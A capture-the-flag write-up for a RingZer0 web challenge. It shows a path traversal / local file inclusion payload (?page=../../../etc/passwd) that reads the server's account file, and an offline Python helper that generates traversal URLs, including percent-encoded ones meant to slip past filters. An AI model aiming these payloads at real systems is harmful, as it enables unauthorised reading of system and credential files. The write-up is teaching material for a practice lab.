Web

Looking for password file

Password file

The hint tells us to look for a password file.
The URL is http://ringzer0team.com:1008/?page=lorem.php. A ?page= parameter whose value is a file name is a giveaway for a page that may be vulnerable to path traversal / local file inclusion: the value is almost certainly handed to an include, so the server will read whatever path we supply.

On a Linux system the local account list is /etc/passwd. It is world-readable, which is why it is the standard proof that a file-read bug works.

So let's try to reach the file by climbing out of the web root with ../ (three levels were enough here; the number needed depends on the directory the include runs from):

http://ringzer0team.com:1008/?page=../../../etc/passwd

Results

 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/usr/sbin/nologin
 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 nobody:x:65534:65534:FLAG-zH9g1934v774Y7Zx5s16t5ym8Z:/nonexistent:/usr/sbin/nologin
 libuuid:x:100:101::/var/lib/libuuid:
 sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
 syslog:x:102:105::/home/syslog:/bin/false

And there's the flag, planted in the GECOS (comment) field of the nobody account.

The flag is: FLAG-zH9g1934v774Y7Zx5s16t5ym8Z
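The steps above (build a ../ payload, confirm the response really is /etc/passwd, pull the flag out of a field) as a small added helper script. This is example code written for this writeup, not part of the challenge or the original post. It does not make any HTTP requests: the sample passwd text is an excerpt copied from the output above, the base URL and parameter name come from the challenge, and the depth range (1..max_depth) is an assumption, since the number of ../ needed depends on where the include runs from.

```python
import re
from urllib.parse import quote

# Excerpt of the /etc/passwd returned by the challenge (copied from the
# output above, embedded here so the script runs offline).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:FLAG-zH9g1934v774Y7Zx5s16t5ym8Z:/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
"""

# RingZer0 flag format, as seen on the page.
FLAG_RE = re.compile(r"FLAG-[A-Za-z0-9]+")


def traversal_urls(base, param, target, max_depth=8, encode=False):
    """Candidate URLs with 1..max_depth '../' prefixes (depth range is an assumption).

    encode=True percent-encodes the slashes, which is handy when a filter
    looks for a literal '../' but the server decodes the query anyway.
    """
    urls = []
    for depth in range(1, max_depth + 1):
        payload = "../" * depth + target.lstrip("/")
        if encode:
            payload = quote(payload, safe="")
        urls.append(f"{base}?{param}={payload}")
    return urls


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; anything that is not 7 colon-separated
    fields with numeric uid/gid (HTML, error text) is skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 7:
            continue
        try:
            uid, gid = int(parts[2]), int(parts[3])
        except ValueError:
            continue
        entries.append({
            "name": parts[0], "passwd": parts[1], "uid": uid, "gid": gid,
            "gecos": parts[4], "home": parts[5], "shell": parts[6],
        })
    return entries


def looks_like_passwd(text):
    """Sanity check before trusting a response: a real passwd file has root with uid 0.
    A 404 page or the normal lorem.php content will fail this."""
    return any(e["name"] == "root" and e["uid"] == 0 for e in parse_passwd(text))


def find_flags(text):
    """Return every flag found in any string field of the parsed entries.
    The challenge hid it in the GECOS field, but checking all fields costs nothing."""
    found = []
    for entry in parse_passwd(text):
        for value in entry.values():
            if isinstance(value, str):
                found.extend(FLAG_RE.findall(value))
    return found


if __name__ == "__main__":
    for url in traversal_urls("http://ringzer0team.com:1008/", "page", "/etc/passwd", max_depth=3):
        print(url)
    print("passwd detected:", looks_like_passwd(SAMPLE_PASSWD))
    print("flags:", find_flags(SAMPLE_PASSWD))
```

In a live run you would fetch each URL from traversal_urls in turn and stop at the first response for which looks_like_passwd is true; the third candidate is exactly the URL used above.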